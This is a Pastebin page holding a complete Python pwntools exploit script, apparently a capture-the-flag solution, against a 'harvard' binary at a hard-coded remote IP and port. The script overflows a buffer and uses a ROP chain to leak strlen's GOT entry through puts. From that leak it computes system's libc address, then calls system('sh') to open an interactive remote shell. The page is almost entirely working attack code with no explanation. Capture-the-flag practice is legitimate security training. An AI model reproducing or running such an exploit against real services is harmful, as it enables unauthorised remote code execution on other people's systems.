Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- from pwn import *
- HOST, PORT = '52.1.91.215', 2114
- elf = ELF('har/harvard')
- strlen_got = elf.got['strlen']
- def preproc(r):
- r.recvuntil(";-) : ")
- r.send('AAAAAAAABBBBBBBBCCCCCCCC' + p64(0x4017df) + "DDDDDDD" + "\n")
- r.recvuntil("Sleep\n")
- r.send('1\n')
- r.recvuntil("Windows\n")
- r.send('1\n')
- r.recvuntil("buy?\n")
- r.send('1\n')
- r.recvuntil("Sleep\n")
- r.send('4\n')
- r.recvuntil("Brookline) ")
- r.send('1\n')
- # leak address
- r = remote(HOST, PORT)
- preproc(r)
- payload = 'A'* 280
- payload += p64(0x0000000000402fc3) # pop rdi; ret
- payload += p64( strlen_got ) # GOT of strlen
- payload += p64( 0x00000000004024ec ) # puts
- payload = payload + ("A"*(399-len(payload)))
- r.send(payload + '\n')
- r.recvuntil('\n')
- r.recvuntil('!\n')
- leak = r.recv()[:-1] + '\x00\x00'
- leak = u64(leak)
- system_address = leak - 0x0000000000089650 + 0x0000000000046640
- print 'get system address: 0x%016x' % system_address
- # run system
- r = remote(HOST, PORT)
- preproc(r)
- payload = 'A'* 280
- payload += p64( 0x0000000000402fc3 ) # pop rdi; ret
- payload += p64( 0x4006be ) # sh
- payload += p64( system_address ) # system
- payload = payload + ("A"*(399-len(payload)))
- r.send(payload + '\n')
- r.interactive()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
